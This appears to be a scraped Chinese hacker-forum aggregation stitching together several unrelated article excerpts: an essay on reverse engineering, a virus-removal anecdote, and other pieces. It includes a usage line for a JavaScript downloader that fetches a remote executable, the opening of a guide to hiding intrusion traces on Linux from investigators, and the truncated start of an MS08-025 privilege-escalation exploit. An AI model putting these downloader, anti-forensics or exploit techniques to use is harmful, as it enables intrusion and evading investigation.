逆向工程不是炫耀者用来装B的工具
作者:Azy
来源:Kernel Pollution
逆向工程不是炫耀者用来装B的工具,因为逆向工程从来就是个脑力活加体力活,同时也是对逆向者身心的极大摧残和对意志力的严峻考验。它需要时间,更需要毅力,任何半途而废的举动都会导致前功尽弃的结果。而这些成本我相信都是那些想要炫耀一时的浮躁者所不肯付出的。
如果说反汇编只是功力不足的浮躁者或者是对解剖对象的不屑者走马观花式的分析举动,那么逆向工程就是长期浸淫于此的心静者和对二进制强烈好奇的探险者令人景仰的还原行为。而对于逆向者本人来讲,这更像是一次艰苦的旅行,但途中却不乏美丽的风景。它是一种大部分时间让人处于崩溃的边缘,但偶尔会让你迸发出发现新大陆的兴奋而能有资本和动力继续崩溃下去的这样一个东西。
真正的逆向者知道,仅仅靠激情是不能过活的。只有激情,远远不够,因为它充其量只是一个必要而非充分条件。
js下载者
作者:lcx
来源:vbs小铺
//将常用的vbs下载者改成js版了。本来想用jsc.exe编译,可是不成功。jsc.exe不认WScript
//use: cscript this.js http://www.xxx.com/xxx.exe c:\xxx.exe
Tags: JavaScript, 下载者用WinHEX远程查杀顽固病毒
文章作者:Helvin [E.S.T 顾问团]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
有个Win2003,跑的服务器不重要,打了补丁很久没重启,前几天蓝屏过,导出蓝屏dmp文件windbg分析,发现Ipnat.sys引起,因为还有其他事情要忙,当时没太在意。今天一看竟然成了肉鸡,疯狂想德国法国的一些80、442、25端口发送包,抓包分析,基本都是病毒体传播和点广告的
病毒本身一共5个文件 srosa.sys hldrrr.exe wintems.exe mdelk.exe 还有一个是放在了Du Meter的自启动下面
冰刃等一些都是“不是有效的win32程序”,杀毒软件更别说了。驱动隐藏驱动、程序、注册表,病毒体、驱动、注册表防删除保护,文件文件夹隐藏设置失效。。。。,因为是远程杀毒,安全模式啥的都不用考虑了。突然看到服务器桌面上装了WinHex,当时爆破一个小软件的时候用的,顺手打开硬盘,找到隐藏的病毒,直接对相应硬盘区域写0,重启。
残留文件删除,注册表清除一下,干净了
Linux 入侵踪迹隐藏攻略
文章作者:xi4oyu
Linux 入侵踪迹隐藏攻略v0.1
免责声明:
本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,转载请保留。
0.前言:
被警察叔叔请去喝茶时间很痛苦的事情,各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深,是我们必须掌握的基本功。当然,如果管理员真的想搞你而他的功力又足够足的话,相信没什么人能够真正的“踏雪无痕”。Forensic 与Anti-Forensic,说到底只是你和管理员之间的技术间较量而已。貌似很少有专门说这个的文章,大部分就是下载个日志擦除的软件,然后运行下就可以了,对小站可以,但对方如果是经验丰富的管理员呢?我们该如何应对?我在这里只介绍unix-like system下的,至于windows或者其他什么系统下的,欢迎各位道友补充。
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
来源:vessial’s easylife
另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行
#include <stdio.h>
#include <windows.h>
typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE ProcessHandle,
